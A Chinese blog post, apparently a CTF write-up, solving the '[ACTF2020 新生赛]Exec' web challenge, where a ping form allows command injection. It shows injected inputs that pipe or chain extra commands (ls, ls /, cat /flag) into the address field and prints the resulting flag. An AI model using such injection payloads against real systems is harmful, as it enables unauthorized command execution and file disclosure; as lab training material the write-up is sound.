公告

欢迎来到我的博客

诺布尔

痴迷于安全技术的小白帽

[ACTF2020 新生赛]Exec

2026-1-15 11:13

|

Web

|

32

239 字

|

2 分钟

[ACTF2020 新生赛]Exec

1、打开题目就看到一个ping的地址框

2、输入127.0.0.1试试

成功ping通

看起来像是pwn的题目，猜测通过列出目录文件，确认是否存在flag文件，并查看文件内容

3、我们通过两种方法解题，一种是管道符，一种是堆叠查询

管道符

（1）先看当前目录下有什么

127.0.0.1 | ls

（2）列出隐藏文件

127.0.0.1 | ls -a

发现存在上级目录，那么当前目录不是根目录

（3）查看根目录的文件

127.0.0.1 | ls /

发现了flag文件

（4）查看根目录的flag文件，得到flag

127.0.0.1 | cat /flag

堆叠查询

列出当前目录；列出隐藏目录；列出根目录下的文件；查看根目录下的flag文件

127.0.0.1 | ls;ls -a;ls /;cat /flag

flag{34f84481-243c-4884-b8f7-1232207caadf}

BUUCTF PWN Web 命令执行

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!